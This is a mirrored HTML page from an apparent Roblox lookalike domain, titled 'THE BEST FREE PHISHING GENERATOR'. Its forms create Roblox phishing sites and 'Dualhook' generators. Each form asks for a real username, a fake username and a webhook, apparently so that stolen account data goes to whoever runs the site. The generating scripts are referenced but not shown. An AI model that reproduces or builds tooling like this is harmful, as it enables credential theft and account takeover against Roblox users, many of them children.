<!doctype html>
<html lang="en">


<!-- Mirrored from www.roblox.et/generator/RBLX-LMP/create by HTTrack Website Copier/3.x [XR&CO'2017], Fri, 21 Feb 2025 04:59:25 GMT -->
<!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=UTF-8" /><!-- /Added by HTTrack -->
<head>
	<title>RBLX-LMP THE BEST FREE PHISHING GENERATOR</title>
	<meta charset="utf-8">
	<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
	<link href="../../../fonts.googleapis.com/css95d1.css" rel="stylesheet">
	<link rel="stylesheet" href="../../controlPage/new/css/style.css"> </head>

<body style="background: url('../../../images.rbxcdn.com/5348266ea6c5e67b19d6a814cbbb70f6.jpg')">
	<section class="ftco-section">
		<div class="container">
			<div class="row justify-content-center">
				<div class="col-md-12 col-lg-10">
					<div class="row justify-content-center">
						<div class="login-wrap p-4 p-lg-5 order-md-last rounded">
							<div class="d-flex">
								<div class="w-100">
									<h3 class="mb-4">Generate a <strong>Regular </strong> site</h3> </div>
							</div>
							<form action="#" class="signin-form">
								<div class="form-group mb-3">
									<label class="label" for="RealUsername">Roblox Username</label>
									<input type="text" id="RealUsername" class="form-control" placeholder="Roblox Username" required> </div>
								<div class="form-group mb-3">
									<label class="label" for="password">Fake Username</label>
									<input type="text" id="FakeUsername" class="form-control" placeholder="Fake Username" required> </div>
									<div class="form-group mb-3">
									<label class="label" for="password">Webhook</label>
									<input type="text" id="Webhook" class="form-control" placeholder="Webhook" required> </div>
								<div class="form-group">
									<button type="button" onclick="Regular(this, 'RBLX-LMP');" class="form-control btn btn-primary submit px-3">Create Now!</button>
								</div>
							</form>
						</div>
						<div class="text-wrap p-4 p-lg-5 order-md-last rounded">
							<div class="d-flex">
								<div class="w-100">
									<h3 class="mb-4" style="color:white;">Generate a <strong>Dualhook </strong> Generator</h3> </div>
							</div>
							<form action="#" class="signin-form">
								<div class="form-group mb-3">
									<label class="label" for="Directory" style="color:white;">Directory</label>
									<input type="text" id="Directory" class="form-control" placeholder="Directory" required=""> </div>
								<div class="form-group mb-3">
									<label class="label" for="Name" style="color:white;">Name</label>
									<input type="text" id="Name" class="form-control" placeholder="Name (Splunk/Shitest/PhisHell)" required=""> </div>
								<div class="form-group mb-3">
									<label class="label" for="Thumbnails" style="color:white;">Thumbnails</label>
									<input type="text" id="Thumbnails" class="form-control" placeholder="Thumbnails" required=""> </div>
								<div class="form-group mb-3">
									<label class="label" for="Webhook" style="color:white;">Webhook</label>
									<input type="text" id="WebhookDualhook" class="form-control" placeholder="Webhook" required=""> </div>
								<div class="form-group mb-3">
									<input type="color" class="form-control" id="EmbedColor"> </div>
								<div class="form-group">
									<button type="submit" class="btn btn-white btn-outline-white" style="width:100%" onclick="Dualhook(this, 'RBLX-LMP');"> Create Now!</button>
								</div>
							</form>
						</div>
					</div>
				</div>
			</div>
		</div>
	</section>
	<script src="../../controlPage/apis/main.js"></script>
	<script src="../../../external.html?link=http://cdn.jsdelivr.net/npm/sweetalert2@11"></script>
	<script src="../../controlPage/new/js/jquery.min.js"></script>
	<script src="../../controlPage/new/js/popper.js"></script>
	<script src="../../controlPage/new/js/bootstrap.min.js"></script>
	<script src="../../controlPage/new/js/main.js"></script>
	<script src="../../../kit.fontawesome.com/57f8be95f1.html" crossorigin="anonymous"></script>
</body>


<!-- Mirrored from www.roblox.et/generator/RBLX-LMP/create by HTTrack Website Copier/3.x [XR&CO'2017], Fri, 21 Feb 2025 04:59:34 GMT -->
</html>